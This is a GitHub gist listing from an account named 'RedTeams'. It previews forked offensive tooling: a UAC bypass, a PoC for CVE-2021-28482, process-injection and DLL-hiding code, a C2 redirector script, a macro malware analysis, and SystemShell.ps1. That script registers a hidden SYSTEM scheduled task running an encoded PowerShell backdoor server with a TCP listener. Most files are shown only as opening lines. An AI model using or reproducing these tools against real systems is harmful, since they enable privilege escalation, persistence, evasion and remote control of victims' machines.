RedTeams
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #define _WIN32_LEAN_AND_MEAN | |
| #include <windows.h> | |
| #include <string.h> | |
| #include <stdio.h> | |
| #include "ssp.h" | |
| BOOL | |
| DllMain( _In_ HINSTANCE hInstance, | |
| _In_ DWORD fdwReason, |
RedTeams
/ sleep.c
Created
July 11, 2022 22:01
— forked from RobinMoschini/sleep.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! | |
| * | |
| * ROGUE | |
| * | |
| * GuidePoint Security LLC | |
| * | |
| * Threat and Attack Simulation | |
| * | |
| !*/ |
RedTeams
/ Compress.cs
Created
December 2, 2021 23:24
— forked from Wra7h/Compress.cs
C# Compression using Windows API
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Compresses a file using the Windows API | |
| //Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\Compress.cs | |
| //Windows Compression API: https://docs.microsoft.com/en-us/windows/win32/api/_cmpapi/ | |
| //Supported Algorithms: https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createcompressor | |
| // Takes a file, compresses it using one of the supported algorithms and creates a file with the compressed data. | |
| using System; | |
| using System.IO; | |
| using System.Linq; |
RedTeams
/ cmlua.cs
Created
August 13, 2021 23:05
— forked from Moriarty2016/cmlua.cs
Bypass UAC with ICMLuaUtil --- .Net Version
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Windows.Forms; | |
| using System.Runtime.InteropServices; | |
| using System.Runtime.CompilerServices; | |
| namespace Test1 | |
| { | |
| public static class Test | |
| { | |
| internal enum HRESULT : long |
RedTeams
/ PoC_CVE-2021-28482.py
Created
May 4, 2021 08:10
— forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
RedTeams
/ SystemShell.ps1
Created
April 20, 2021 12:01
— forked from S3cur3Th1sSh1t/SystemShell.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $confirmpreference = "none" | |
| function Get-ScheduledTaskSystem | |
| { | |
| $Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}) | |
| $SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount | |
| $action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc JABlAGEAcwB5AGIAaQBuAGQAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBJAE8AOwAKAG4AYQBtAGUAcwBwAGEAYwBlACAAQgBhAGMAawBkAG8AbwByAFMAZQByAHYAZQByAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABCAGEAYwBrAGQAbwBvAHIACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAFQAYwBwAEwAaQBzAHQAZQBuAGUAcgAgAGwAaQBzAHQAZQBuAGUAcgA7AAoAIAAgACAAIAAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABTAG8AYwBrAGUAdAAgAG0AYQBpAG |
RedTeams
/ VBA XLS + Invoke-Obfuscation
Created
April 2, 2021 19:47
— forked from seclib/VBA XLS + Invoke-Obfuscation
VBA XLS + Invoke-Obfuscation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @satya_enki | |
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MASIHB-- 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29 | |
| =============================================================================== | |
| FILE: 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- |
RedTeams
/ Automated-Redirectors.py
Created
March 14, 2021 20:47
— forked from mhaskar/Automated-Redirectors.py
Python script to create HTTPS redirectors that pointing to your C2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import requests | |
| import json | |
| import time | |
| import paramiko | |
| from Crypto.PublicKey import RSA | |
| from os import chmod | |
| public_key_name = "test1.key" |
RedTeams
/ HideModule.cpp
Created
February 28, 2021 09:14
— forked from Fonger/HideModule.cpp
Hide DLL ( 32bit and 64bit support)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include "HideModule.h" | |
| std::vector<UNLINKED_MODULE> UnlinkedModules; | |
| void RelinkModuleToPEB(HMODULE hModule) | |
| { | |
| std::vector<UNLINKED_MODULE>::iterator it = std::find_if(UnlinkedModules.begin(), UnlinkedModules.end(), FindModuleHandle(hModule)); | |
| if (it == UnlinkedModules.end()) |
RedTeams
/ DInjectQueuerAPC.cs
Created
February 28, 2021 08:58
— forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |